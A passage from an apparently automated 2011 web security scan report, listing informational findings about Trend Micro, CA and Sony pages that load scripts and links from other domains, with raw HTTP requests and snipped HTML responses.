...[SNIP]...
<a href="#"><img border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/icon_printer.gif" alt="Print"/></a>
...[SNIP]...
</script>


<script language="javascript1.2" src="//libs.coremetrics.com/eluminate.js" type="text/javascript">
</script>
...[SNIP]...
<!-- ####################################### -->


<script src="https://display.digitalriver.com/?aid=244&tax=trend_micro" type="text/javascript" defer="defer"></script>
...[SNIP]...

12.7. https://store.trendmicro.com/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.trendmicro.com
Path:   /store

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage HTTP/1.1
Host: store.trendmicro.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.2.2.129:260-0#0"; JSESSIONID=74CA66C6686E81F96F871B79152A151D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=2164392458.260.0000; __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.2.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2Fhome-user%2F%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2F%22%2C%22t%22%3A1315350861448%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fwww.trendsecure.com%2Fcommonapi%2Fredirect.php%3Fl%3Den-US%26a%3DMT-EN%22%2C%22l%22%3A%22My%20Account%20Log-In%5Cn%22%2C%22de%22%3A%7B%22su%22%3A%22Free%20online%20virus%20scan%20and%20antivirus%20trial%20downloads.%20Get%20it%20only%20from%20TrendMicro.com!%22%2C%22ti%22%3A%22Home%20%26%20Home%20Office%20%7C%20Internet%20Security%20Software%22%2C%22nw%22%3A253%2C%22nl%22%3A225%7D%7D; fsr.s={"v":1,"rid":"1315350793273_559343","pv":2,"to":3.5,"c":"http://us.trendmicro.com/us/home/home-user/","lc":{"d1":{"v":2,"s":true}},"cd":1,"sd":1,"f":1315350865822}

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=101360405795,0)
Date: Tue, 06 Sep 2011 18:15:31 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app96
Content-Length: 95454


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<meta name="author" content="Trend Micro Global Web Development MUC ;-)">

<link rel="icon" href="//a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/v2.0-img/images/trend/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="//a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/v2.0-img/images/trend/favicon.ico" type="image/x-icon" />

<meta name="X-Imperia-Live-Info" content="434533e2-78c9-5cfe-f9ed-c2bcbc0c2e76/1/6/4147">
...[SNIP]...
<!--!/esi:include -->
<link rel="stylesheet" href="https://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=tmamer&StyleID=1876500&StyleVersion=55&styleIncludeFile=style.css" type="text/css" media="all" />
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=2ad48102&Env=BASE&Locale=en_US&SiteID=tmamer&StyleID=1876500&StyleVersion=55&ceid=177147900&cename=TopHeader&id=ShoppingCartPage"-
...[SNIP]...
<!-- begin site specific javascript -->


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_globalTrial.js"></script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_ShoppingCartPage_contentBody.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/jqCookie.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/browser_os_detect.js"></script>
...[SNIP]...
<!-- Begin Hiconversion Head Enabling. Do NOT move. Must come directly before the closing head tag -->
               <script id='hiconversion_head_include' type='text/javascript' src='https://www.hiconversion.com/enabling/update.jsp?external=&version=1.0'></script>
...[SNIP]...
<a href="http://store.trendmicro.com/store"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/images/logotrendmicro_3d_tagline_b.gif" alt="Trend Micro: Securing your Journey to the Cloud" height="50" width="305"></a>
       </div>
<div id="dr_verisign">
   <script src="https://seal.verisign.com/getseal?host_name=store.trendmicro.com&size=M&use_flash=YES&use_transparent=YES&lang=en"></script>
...[SNIP]...
<!--Checkout-->
<img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/Aug09/carthead_b.gif" height="27" alt="shopping cart" />
<div class="bcGrey">
...[SNIP]...
<div id="dr_moneyBackGuarantee"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/30DayMBSG-CMYK-Burst_sm2.gif" /></div>
...[SNIP]...
<div id="dr_cartProdImage" style="float:left;">
<img alt="Titanium AntiVirus+ - 1 year" src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/tmamer/images/product/thumbnail/TiAV542.gif" border="0"/> </div>
...[SNIP]...
<div id="dr_cartProdImage" style="float:left;">
<img alt="Smart Surfing for Mac - 1 year Complimentary Copy" src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/tmamer/images/product/thumbnail/SSM542.jpg" border="0"/> </div>
...[SNIP]...
<a href="/DRHM/store?Action=DisplayBackUpCDInformationPage&SiteID=tmamer&Locale=en_US&Env=BASE" onclick="popUp(this.href,'BackupCD',410,360);return false;" target="_blank"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/pb/images/siteOpt/cdimg.png" border="0" class="backupcdimage" />
<span class="dr_blueOfferHeader">
...[SNIP]...
<a href="/DRHM/store?Action=AddItemToRequisition&SiteID=tmamer&Locale=en_US&Env=BASE&productID=8350200&productDataID=1934000000" onClick="q=false"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/buttons/add2.jpg" border="0" name="Add_8350200" /></a>
...[SNIP]...
<td class="paymentimages"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/images/images/cartPaymentOptions3.gif" alt="Visa, Master Card, Discover, American Express, Diner's Club International, JCB, PayPal, Wire Transfer" /></td>
...[SNIP]...
<div class="dr_cart_details_overlay_arrow"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/cdo_arrow.gif"/></div>
...[SNIP]...
<a href="javascript:void(closeProductDetailsOverlay())" title="Close Window" onmouseover="self.status='Close Window';return true;" onmouseout="self.status='';return true;"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/close_en_US.gif" alt="Close Window" align="right" border="0" /></a>
...[SNIP]...
<div>

<img class="dr_cart_details_overlay_boxshot" align="left" alt="Titanium AntiVirus+ - 1 year" src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/tmamer/images/product/thumbnail/TiAV542.gif" border="0"/>

<div class="dr_cart_details_overlay_description">
...[SNIP]...
<div class="dr_cart_details_overlay_arrow"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/cdo_arrow.gif"/></div>
...[SNIP]...
<a href="javascript:void(closeProductDetailsOverlay())" title="Close Window" onmouseover="self.status='Close Window';return true;" onmouseout="self.status='';return true;"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/close_en_US.gif" alt="Close Window" align="right" border="0" /></a>
...[SNIP]...
<div>

<img class="dr_cart_details_overlay_boxshot" align="left" alt="Smart Surfing for Mac - 1 year Complimentary Copy" src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/tmamer/images/product/thumbnail/SSM542.jpg" border="0"/>

<div class="dr_cart_details_overlay_description">
...[SNIP]...
<div class="dr_cart_details_overlay_arrow"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/cdo_arrow.gif"/></div>
...[SNIP]...
<a href="javascript:void(closeProductDetailsOverlay())" title="Close Window" onmouseover="self.status='Close Window';return true;" onmouseout="self.status='';return true;"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/close_en_US.gif" alt="Close Window" align="right" border="0" /></a>
...[SNIP]...
<div>

<img class="dr_cart_details_overlay_boxshot" align="left" alt="Extended Download Service" src="//drh2.img.digitalriver.com/DRHM/Storefront/Company/tmamer/images/product/thumbnail/pixel.gif" border="0"/>

<div class="dr_cart_details_overlay_description">
...[SNIP]...
<a href="javascript:checkSN();" onClick="q=false;"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/buttons/continuecheckout2.jpg" onClick="javascript:processPage();q=false;" alt="Continue" /></a>
...[SNIP]...
<div id="postProc" style="visibility:hidden;margin-top:-30px;">
<img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/pageLoading_en_US.gif" border="0" />
</div>
...[SNIP]...
<a href="/DRHM/store?Action=ContinueShopping&SiteID=tmamer&Locale=en_US&Env=BASE" onClick="q=false"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/sc_continueshopping_en_US.gif" /></a>
...[SNIP]...
<a href="javascript:checkSN();" onClick="q=false"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/buttons/continuecheckout2.jpg" /></a>
...[SNIP]...
<a href="javascript:checkSN();" onClick="q=false;"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/buttons/continuecheckout2.jpg" /></a>
...[SNIP]...
<a href="#" title="Close Window"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/close_en_US.gif" align="right" alt="Close Window" border="0"/></a>
...[SNIP]...
<a href="/store/defaults/en_US/DisplayDRAboutDigitalRiverPage" target="DrOverlayIframe"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/images/dr_logo_0209.gif" width="115" height="27" alt="Digital River" border="0"></a>
...[SNIP]...
<a href="#"><img border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/tmamer/tmamerSI/version/250/images/icon_printer.gif" alt="Print"/></a>
...[SNIP]...
</script>


<script language="javascript1.2" src="//libs.coremetrics.com/eluminate.js" type="text/javascript">
</script>
...[SNIP]...
<!-- ####################################### -->


<script src="https://display.digitalriver.com/?aid=244&tax=trend_micro" type="text/javascript" defer="defer"></script>
...[SNIP]...

12.8. https://www.ca.com/us/register/createprofile.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/createprofile.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /us/register/createprofile.aspx?returnURL=/us/default.aspx HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: http://www.ca.com/us/default.aspx
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351461237:ss=1315351389192

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:25:47 GMT
Content-Length: 458334


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<scri
...[SNIP]...
<link href="/css/AutoComplete.css" rel="stylesheet" type="text/css" media="screen" />-->

<link href="https://f.fontdeck.com/s/css/zH28mslJNSfrEtk/N8vkA5GMvEQ/*.ca.com/6172.css" rel="stylesheet" type="text/css"/>
<link href="/css/base.css" rel="stylesheet" type="text/css" media="screen"/>
...[SNIP]...
<link href="/~/media/css/legacy-global.css" rel="stylesheet" type="text/css" media="screen" />-->


<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="https://secure.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

12.9. https://www.ca.com/us/register/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/login.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: http://www.ca.com/us/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351414553:ss=1315351389192; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:23:42 GMT
Content-Length: 36056


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<meta htt
...[SNIP]...
<link href="/css/AutoComplete.css" rel="stylesheet" type="text/css" media="screen" />-->

<link href="https://f.fontdeck.com/s/css/zH28mslJNSfrEtk/N8vkA5GMvEQ/*.ca.com/6172.css" rel="stylesheet" type="text/css"/>
<link href="/css/base.css" rel="stylesheet" type="text/css" media="screen"/>
...[SNIP]...
<link href="/~/media/css/legacy-global.css" rel="stylesheet" type="text/css" media="screen" />-->


<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="https://secure.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

12.10. http://www.kb.sony.com/selfservice/common/viewdocument_appFooter.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /selfservice/common/viewdocument_appFooter.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /selfservice/common/viewdocument_appFooter.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294 HTTP/1.1
Host: www.kb.sony.com
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 2794
Date: Tue, 06 Sep 2011 18:51:21 GMT


<html>
<head>
<title>Search Results Page</title>
<link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet">
</head>

<body bgcolor="#FFFFFF" text=
...[SNIP]...
</A>&nbsp;
       <A onmouseover=" window.status='Learn about the latest Sony products at the Learning Center.'; return true" onmouseout="window.status=' '; return true" href="http://www.learningcenter.sony.us/home.php" target=_blank>Learning Center</A>
...[SNIP]...

12.11. http://www.kb.sony.com/selfservice/microsites/search.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /selfservice/microsites/search.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294 HTTP/1.1
Host: www.kb.sony.com
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/searchEntry.do?locale=LA_eng_US&usemicrosite=true&region=UMRE_UNITEDSTATES_2_5&sonyregion=US&searchString=dvd%20mp3&product=&sonytemplate=&sonymodel=&language=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"}}

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 6646
Date: Tue, 06 Sep 2011 18:51:20 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<head>
   <title>
       View Document
   </title>
   <script type="text/
...[SNIP]...
<body>
       One must have a frames-capable browser to use Knova Case Response. Get one here: <a href="http://mozilla.org">http://mozilla.org</a>
...[SNIP]...

12.12. http://www.kb.sony.com/selfservice/microsites/searchEntry.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /selfservice/microsites/searchEntry.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /selfservice/microsites/searchEntry.do?locale=LA_eng_US&usemicrosite=true&region=UMRE_UNITEDSTATES_2_5&sonyregion=US&searchString=dvd%20mp3&product=&sonytemplate=&sonymodel=&language=en_US HTTP/1.1
Host: www.kb.sony.com
Proxy-Connection: keep-alive
Referer: http://esupport.sony.com/US/perl/index.pl
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%7D; fsr.a=1315353067536

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Tue, 06 Sep 2011 18:51:06 GMT
Content-Length: 172584

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Search Results</title>
<meta http-equi
...[SNIP]...
</A>&nbsp;
       <A onmouseover=" window.status='Learn about the latest Sony products at the Learning Center.'; return true" onmouseout="window.status=' '; return true" href="http://www.learningcenter.sony.us/home.php" target=_blank>Learning Center</A>
...[SNIP]...

13. Cross-domain script include  previous  next
There are 21 instances of this issue:

Issue background

